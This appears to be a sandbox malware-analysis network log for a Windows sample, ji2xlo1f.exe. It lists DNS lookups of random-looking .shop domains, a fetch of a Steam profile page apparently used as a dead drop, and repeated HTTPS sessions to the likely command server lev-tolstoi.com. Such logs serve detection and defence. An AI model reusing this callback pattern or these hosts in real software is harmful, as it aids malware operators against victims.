Dec 18, 2024 15:17:41.446129084 CET | 443 | 49715 | 23.55.153.106 | 192.168.2.6
Dec 18, 2024 15:17:41.446187019 CET | 443 | 49715 | 23.55.153.106 | 192.168.2.6
Dec 18, 2024 15:17:41.446206093 CET | 49715 | 443 | 192.168.2.6 | 23.55.153.106
Dec 18, 2024 15:17:41.446208954 CET | 443 | 49715 | 23.55.153.106 | 192.168.2.6
Dec 18, 2024 15:17:41.446284056 CET | 49715 | 443 | 192.168.2.6 | 23.55.153.106
Dec 18, 2024 15:17:41.591547012 CET | 49715 | 443 | 192.168.2.6 | 23.55.153.106
Dec 18, 2024 15:17:41.591567993 CET | 443 | 49715 | 23.55.153.106 | 192.168.2.6
Dec 18, 2024 15:17:41.591584921 CET | 49715 | 443 | 192.168.2.6 | 23.55.153.106
Dec 18, 2024 15:17:41.591593027 CET | 443 | 49715 | 23.55.153.106 | 192.168.2.6
Dec 18, 2024 15:17:41.890295982 CET | 49724 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:17:41.890311003 CET | 443 | 49724 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:17:41.890418053 CET | 49724 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:17:41.890937090 CET | 49724 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:17:41.890954018 CET | 443 | 49724 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:17:43.119225979 CET | 443 | 49724 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:17:43.119364977 CET | 49724 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:17:43.158876896 CET | 49724 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:17:43.158900023 CET | 443 | 49724 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:17:43.159873009 CET | 443 | 49724 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:17:43.173649073 CET | 49724 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:17:43.173674107 CET | 49724 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:17:43.173841000 CET | 443 | 49724 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:17:45.454425097 CET | 443 | 49724 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:17:45.454546928 CET | 443 | 49724 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:17:45.454664946 CET | 49724 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:17:45.454740047 CET | 49724 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:17:45.454760075 CET | 443 | 49724 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:17:45.454773903 CET | 49724 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:17:45.454787970 CET | 443 | 49724 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:17:45.583229065 CET | 49739 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:17:45.583265066 CET | 443 | 49739 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:17:45.583636045 CET | 49739 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:17:45.584111929 CET | 49739 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:17:45.584122896 CET | 443 | 49739 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:17:46.797827005 CET | 443 | 49739 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:17:46.797919035 CET | 49739 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:17:46.806118965 CET | 49739 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:17:46.806139946 CET | 443 | 49739 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:17:46.806420088 CET | 443 | 49739 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:17:46.815669060 CET | 49739 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:17:46.815712929 CET | 49739 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:17:46.815773010 CET | 443 | 49739 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:17:47.991031885 CET | 443 | 49739 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:17:47.991077900 CET | 443 | 49739 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:17:47.991112947 CET | 443 | 49739 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:17:47.991138935 CET | 443 | 49739 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:17:47.991167068 CET | 443 | 49739 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:17:47.991170883 CET | 49739 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:17:47.991187096 CET | 443 | 49739 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:17:47.991213083 CET | 49739 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:17:47.991219044 CET | 443 | 49739 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:17:47.991229057 CET | 49739 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:17:47.991235971 CET | 443 | 49739 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:17:47.991276026 CET | 49739 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:17:47.999403954 CET | 443 | 49739 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:17:48.007930040 CET | 443 | 49739 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:17:48.008044004 CET | 49739 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:17:48.008050919 CET | 443 | 49739 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:17:48.110945940 CET | 443 | 49739 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:17:48.111054897 CET | 49739 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:17:48.111068010 CET | 443 | 49739 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:17:48.163393974 CET | 49739 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:17:48.209464073 CET | 443 | 49739 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:17:48.211812973 CET | 443 | 49739 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:17:48.211896896 CET | 49739 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:17:48.211905956 CET | 443 | 49739 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:17:48.211936951 CET | 443 | 49739 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:17:48.211986065 CET | 49739 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:17:48.212033987 CET | 443 | 49739 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:17:48.212184906 CET | 443 | 49739 | 104.21.66.86 | 192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:48.212213993 CET49739443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:48.212241888 CET44349739104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:48.212254047 CET49739443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:48.212261915 CET44349739104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:48.212270975 CET49739443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:48.212274075 CET44349739104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:48.317536116 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:48.317589998 CET44349747104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:48.317699909 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:48.318015099 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:48.318026066 CET44349747104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:49.546305895 CET44349747104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:49.546406031 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:49.619651079 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:49.619673014 CET44349747104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:49.620722055 CET44349747104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:49.643990993 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:49.644188881 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:49.644237041 CET44349747104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:54.184470892 CET44349747104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:54.184570074 CET44349747104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:54.184751034 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:54.184798956 CET49747443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:54.346293926 CET49761443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:54.346348047 CET44349761104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:54.346441984 CET49761443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:54.346798897 CET49761443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:54.346817017 CET44349761104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:55.562443018 CET44349761104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:55.562519073 CET49761443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:55.563998938 CET49761443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:55.564011097 CET44349761104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:55.564368010 CET44349761104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:55.565639019 CET49761443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:55.565771103 CET49761443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:55.565803051 CET44349761104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:55.565866947 CET49761443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:55.565874100 CET44349761104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:58.572990894 CET44349761104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:58.573081017 CET44349761104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:58.573131084 CET49761443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:58.573323965 CET49761443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:58.573343039 CET44349761104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:58.783680916 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:58.783720970 CET44349771104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:58.783876896 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:58.784284115 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:17:58.784296036 CET44349771104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:00.002285004 CET44349771104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:00.002373934 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:00.004319906 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:00.004332066 CET44349771104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:00.004575968 CET44349771104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:00.006306887 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:00.006541967 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:00.006586075 CET44349771104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:00.006649017 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:00.006659031 CET44349771104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:01.958435059 CET44349771104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:01.958559990 CET44349771104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:01.958707094 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:01.958889961 CET49771443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:03.252577066 CET49782443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:03.252607107 CET44349782104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:03.252712011 CET49782443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:03.253081083 CET49782443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:03.253089905 CET44349782104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:04.470695972 CET44349782104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:04.470967054 CET49782443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:04.472646952 CET49782443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:04.472662926 CET44349782104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:04.472918987 CET44349782104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:04.474560022 CET49782443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:04.474560022 CET49782443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:04.474592924 CET44349782104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:05.640451908 CET44349782104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:05.640563965 CET44349782104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:05.640615940 CET49782443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:05.645277023 CET49782443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:05.645292044 CET44349782104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:06.638206005 CET49790443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:06.638262987 CET44349790104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:06.638521910 CET49790443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:06.638844967 CET49790443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:06.638859034 CET44349790104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:07.954288960 CET44349790104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:07.954371929 CET49790443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:07.994103909 CET49790443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:07.994127989 CET44349790104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:07.994455099 CET44349790104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:07.995863914 CET49790443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:07.996752977 CET49790443192.168.2.6104.21.66.86
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:07.996788025 CET44349790104.21.66.86192.168.2.6
                                                                                                                                                                                                                                        Dec 18, 2024 15:18:07.997041941 CET49790443192.168.2.6104.21.66.86
Dec 18, 2024 15:18:07.997077942 CET | 443 | 49790 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:18:07.997697115 CET | 49790 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:18:07.997746944 CET | 443 | 49790 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:18:07.998740911 CET | 49790 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:18:07.998780966 CET | 443 | 49790 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:18:07.998969078 CET | 49790 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:18:07.999007940 CET | 443 | 49790 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:18:07.999150991 CET | 49790 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:18:07.999180079 CET | 443 | 49790 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:18:07.999197006 CET | 49790 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:18:07.999214888 CET | 443 | 49790 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:18:07.999360085 CET | 49790 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:18:07.999394894 CET | 443 | 49790 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:18:07.999408960 CET | 49790 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:18:07.999533892 CET | 49790 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:18:07.999562025 CET | 49790 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:18:08.047331095 CET | 443 | 49790 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:18:08.047530890 CET | 49790 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:18:08.047569036 CET | 443 | 49790 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:18:08.047595024 CET | 49790 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:18:08.047620058 CET | 443 | 49790 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:18:08.047676086 CET | 49790 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:18:08.047703981 CET | 443 | 49790 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:18:08.047715902 CET | 49790 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:18:08.047719955 CET | 443 | 49790 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:18:14.513245106 CET | 443 | 49790 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:18:14.513339043 CET | 443 | 49790 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:18:14.513391972 CET | 49790 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:18:14.513537884 CET | 49790 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:18:14.513550997 CET | 443 | 49790 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:18:14.555057049 CET | 49817 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:18:14.555105925 CET | 443 | 49817 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:18:14.555187941 CET | 49817 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:18:14.555572033 CET | 49817 | 443 | 192.168.2.6 | 104.21.66.86
Dec 18, 2024 15:18:14.555589914 CET | 443 | 49817 | 104.21.66.86 | 192.168.2.6
Dec 18, 2024 15:18:15.647918940 CET | 49817 | 443 | 192.168.2.6 | 104.21.66.86
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 18, 2024 15:17:35.709139109 CET | 63769 | 53 | 192.168.2.6 | 1.1.1.1
Dec 18, 2024 15:17:35.928087950 CET | 53 | 63769 | 1.1.1.1 | 192.168.2.6
Dec 18, 2024 15:17:36.052126884 CET | 55056 | 53 | 192.168.2.6 | 1.1.1.1
Dec 18, 2024 15:17:36.191143990 CET | 53 | 55056 | 1.1.1.1 | 192.168.2.6
Dec 18, 2024 15:17:36.192610979 CET | 57083 | 53 | 192.168.2.6 | 1.1.1.1
Dec 18, 2024 15:17:36.413052082 CET | 53 | 57083 | 1.1.1.1 | 192.168.2.6
Dec 18, 2024 15:17:36.424196959 CET | 57898 | 53 | 192.168.2.6 | 1.1.1.1
Dec 18, 2024 15:17:36.645276070 CET | 53 | 57898 | 1.1.1.1 | 192.168.2.6
Dec 18, 2024 15:17:36.738534927 CET | 57779 | 53 | 192.168.2.6 | 1.1.1.1
Dec 18, 2024 15:17:36.878353119 CET | 53 | 57779 | 1.1.1.1 | 192.168.2.6
Dec 18, 2024 15:17:36.962635994 CET | 62264 | 53 | 192.168.2.6 | 1.1.1.1
Dec 18, 2024 15:17:37.100126028 CET | 53 | 62264 | 1.1.1.1 | 192.168.2.6
Dec 18, 2024 15:17:37.383090019 CET | 55807 | 53 | 192.168.2.6 | 1.1.1.1
Dec 18, 2024 15:17:37.609543085 CET | 53 | 55807 | 1.1.1.1 | 192.168.2.6
Dec 18, 2024 15:17:37.613349915 CET | 61328 | 53 | 192.168.2.6 | 1.1.1.1
Dec 18, 2024 15:17:37.751405001 CET | 53 | 61328 | 1.1.1.1 | 192.168.2.6
Dec 18, 2024 15:17:37.754473925 CET | 64818 | 53 | 192.168.2.6 | 1.1.1.1
Dec 18, 2024 15:17:37.984594107 CET | 53 | 64818 | 1.1.1.1 | 192.168.2.6
Dec 18, 2024 15:17:37.987747908 CET | 53881 | 53 | 192.168.2.6 | 1.1.1.1
Dec 18, 2024 15:17:38.125514030 CET | 53 | 53881 | 1.1.1.1 | 192.168.2.6
Dec 18, 2024 15:17:41.666347027 CET | 49955 | 53 | 192.168.2.6 | 1.1.1.1
Dec 18, 2024 15:17:41.888818979 CET | 53 | 49955 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 18, 2024 15:17:35.709139109 CET | 192.168.2.6 | 1.1.1.1 | 0xc3fd | Standard query (0) | terracedjz.cyou | A (IP address) | IN (0x0001) | false
Dec 18, 2024 15:17:36.052126884 CET | 192.168.2.6 | 1.1.1.1 | 0x5d8 | Standard query (0) | worddosofrm.shop | A (IP address) | IN (0x0001) | false
Dec 18, 2024 15:17:36.192610979 CET | 192.168.2.6 | 1.1.1.1 | 0xb901 | Standard query (0) | mutterissuen.shop | A (IP address) | IN (0x0001) | false
Dec 18, 2024 15:17:36.424196959 CET | 192.168.2.6 | 1.1.1.1 | 0x2b8f | Standard query (0) | standartedby.shop | A (IP address) | IN (0x0001) | false
Dec 18, 2024 15:17:36.738534927 CET | 192.168.2.6 | 1.1.1.1 | 0x155c | Standard query (0) | nightybinybz.shop | A (IP address) | IN (0x0001) | false
Dec 18, 2024 15:17:36.962635994 CET | 192.168.2.6 | 1.1.1.1 | 0x4b06 | Standard query (0) | conceszustyb.shop | A (IP address) | IN (0x0001) | false
Dec 18, 2024 15:17:37.383090019 CET | 192.168.2.6 | 1.1.1.1 | 0x33e8 | Standard query (0) | bakedstusteeb.shop | A (IP address) | IN (0x0001) | false
Dec 18, 2024 15:17:37.613349915 CET | 192.168.2.6 | 1.1.1.1 | 0x5e5 | Standard query (0) | respectabosiz.shop | A (IP address) | IN (0x0001) | false
Dec 18, 2024 15:17:37.754473925 CET | 192.168.2.6 | 1.1.1.1 | 0xa7b5 | Standard query (0) | moutheventushz.shop | A (IP address) | IN (0x0001) | false
Dec 18, 2024 15:17:37.987747908 CET | 192.168.2.6 | 1.1.1.1 | 0x2f73 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Dec 18, 2024 15:17:41.666347027 CET | 192.168.2.6 | 1.1.1.1 | 0xb231 | Standard query (0) | lev-tolstoi.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 18, 2024 15:17:30.642666101 CET | 1.1.1.1 | 192.168.2.6 | 0x5266 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 18, 2024 15:17:30.642666101 CET | 1.1.1.1 | 192.168.2.6 | 0x5266 | No error (0) | fp2e7a.wpc.phicdn.net |  | 192.229.221.95 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 15:17:32.989937067 CET | 1.1.1.1 | 192.168.2.6 | 0xf2e7 | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 15:17:32.989937067 CET | 1.1.1.1 | 192.168.2.6 | 0xf2e7 | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 15:17:35.928087950 CET | 1.1.1.1 | 192.168.2.6 | 0xc3fd | Name error (3) | terracedjz.cyou | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 15:17:36.191143990 CET | 1.1.1.1 | 192.168.2.6 | 0x5d8 | Name error (3) | worddosofrm.shop | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 15:17:36.413052082 CET | 1.1.1.1 | 192.168.2.6 | 0xb901 | Name error (3) | mutterissuen.shop | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 15:17:36.645276070 CET | 1.1.1.1 | 192.168.2.6 | 0x2b8f | Name error (3) | standartedby.shop | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 15:17:36.878353119 CET | 1.1.1.1 | 192.168.2.6 | 0x155c | Name error (3) | nightybinybz.shop | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 15:17:37.100126028 CET | 1.1.1.1 | 192.168.2.6 | 0x4b06 | Name error (3) | conceszustyb.shop | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 15:17:37.609543085 CET | 1.1.1.1 | 192.168.2.6 | 0x33e8 | Name error (3) | bakedstusteeb.shop | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 15:17:37.751405001 CET | 1.1.1.1 | 192.168.2.6 | 0x5e5 | Name error (3) | respectabosiz.shop | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 15:17:37.984594107 CET | 1.1.1.1 | 192.168.2.6 | 0xa7b5 | Name error (3) | moutheventushz.shop | none | none | A (IP address) | IN (0x0001) | false
Dec 18, 2024 15:17:38.125514030 CET | 1.1.1.1 | 192.168.2.6 | 0x2f73 | No error (0) | steamcommunity.com |  | 23.55.153.106 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 15:17:41.888818979 CET | 1.1.1.1 | 192.168.2.6 | 0xb231 | No error (0) | lev-tolstoi.com |  | 104.21.66.86 | A (IP address) | IN (0x0001) | false
Dec 18, 2024 15:17:41.888818979 CET | 1.1.1.1 | 192.168.2.6 | 0xb231 | No error (0) | lev-tolstoi.com |  | 172.67.157.254 | A (IP address) | IN (0x0001) | false
• steamcommunity.com
• lev-tolstoi.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49715 | 23.55.153.106 | 443 | 4176 | C:\Users\user\Desktop\ji2xlo1f.exe
                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                        2024-12-18 14:17:40 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                        Host: steamcommunity.com
                                                                                                                                                                                                                                        2024-12-18 14:17:41 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
